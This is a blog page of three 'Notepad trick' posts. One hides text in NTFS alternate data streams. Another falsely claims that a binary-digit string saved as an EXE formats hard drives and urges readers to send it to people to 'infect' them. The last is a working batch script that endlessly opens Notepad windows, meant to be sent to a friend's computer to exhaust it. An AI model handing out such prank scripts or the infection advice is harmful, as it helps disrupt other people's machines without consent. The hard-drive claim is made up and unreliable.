Showing posts with label NOTEPAD TRICK. Show all posts
Showing posts with label NOTEPAD TRICK. Show all posts

Friday, 15 June 2012

Trick to Hide the Data in Notepad

Now we can hide all of our Private Data in the Notepad as there is an interesting Trick to Hide the Data in Notepad. Here is a simple Trick to Hide text inside Windows Notepad using Command Prompt.

Note : This Trick only works on NTFS File System.
To use this simple Trick follow these simple steps :
1) Now click Start  >>  Run  >>  cmd to Open Command Prompt.
2) Type cd desktop to move File to the desktop.
3) Type "notepad filename.txt:hidden" ( without quotes  ) in Command Prompt.
4) Write Some Private or any Data to be Hidden and Save the file.
5) Browse to the File Location and Open filename.txt. Now we cannot see any data in the File.
6) To retrieve the Hidden Data, Open Command Prompt again and type the Same command  "Notepad filename.txt:hidden" ( without quotes ).
7) Now the Hidden data has been retrieved.
So it is a simple Trick to Hide the Data in Notepad.

Friday, 25 May 2012

Format HDD with notepad !!!

Step 1.

Copy The Following In Notepad Exactly as it says


01001011000111110010010101010101010000011111100000

Step 2.

Save As An EXE Any Name Will Do

Step 3.

Send the EXE to People And Infect!!!!!!!!!!

Saturday, 28 May 2011

Notepad Trick to Open notepad continuously

This simple computer prank consists of a code below that will drive your friend crazy as it opens notepad continuously.
When you type the below code and rename it as *.bat it take the above showed icon shape.

To Open Notepad continuously in your friend’s computer:

Type the code in notepad as :

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

Save it as “notepad.BAT” and send it.

Note: If you want to try it, then go ahead and when you built this file double click to open it. But beware it slows your system and you will be left with no other option than to restart, as this script opens 100’s of notepad window. So, If you want to try this than save all your work and then run this file.